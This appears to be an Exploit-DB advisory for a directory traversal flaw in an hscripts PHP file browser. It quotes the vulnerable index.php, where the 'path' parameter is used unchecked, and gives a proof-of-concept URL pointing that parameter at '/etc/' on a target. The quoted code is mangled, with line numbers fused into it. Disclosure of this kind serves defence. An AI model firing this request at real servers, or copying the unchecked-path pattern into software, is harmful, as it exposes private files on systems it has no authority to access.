# Exploit Title: PHP File Browser Script 1 - Directory Traversal # Dork: N/A # Date: 2018-09-03 # Exploit Author: Özkan Mustafa Akkuş (AkkuS) # Vendor Homepage: https://www.hscripts.com/scripts/php/file-browser.php # Software Link: https://www.hscripts.com/scripts/php/downloads/file-browser-demo.zip # Version: 1.0 # Category: Webapps # Tested on: Kali Linux # Description: The "index.php" is vulnerable to directory traversal: on line 73 the `path` request parameter is assigned to $path as-is, without being canonicalized (e.g. realpath()) or checked to lie inside the intended base directory, so the script browses whatever location the caller names. # An attacker can view and read any file or directory whose name is known. # Vulnerable File: index.php <?php // line 45 72$script = basename(__FILE__); // the name of this script 73$path = !empty($_REQUEST['path']) ? $_REQUEST['path'] : "demo"; // the path the script should access 74 75if($loc!=''){ 76echo "<p id='bloc'><b>Browsing Location: </b><a href='https://www.exploit-db.com/exploits/45327/index.php'><b>".ucfirst($loc1)."</b></a> 77<a href='https://www.exploit-db.com/exploits/45327/$script?path=$rpath/$loc1/$loc2'><b>".ucfirst($locdem2)."</b></a> 78<a href='https://www.exploit-db.com/exploits/45327/'><b>".ucfirst($locdem3)."</b></a></p>";} 79else{ 80echo "<p id='bloc'><b>Browsing Location: </b><a href='https://www.exploit-db.com/exploits/45327/'><b>Demo</b></a></p>"; ?> // line 151 # PoC : https://Target/scripts/php/file-browser-demo/index.php?path=[DirectoryName] # Replace [DirectoryName] with a directory name that is known to exist on the target. # Example: '/etc/' or '/var/www/' # https://Target/scripts/php/file-browser-demo/index.php?path=/etc/ |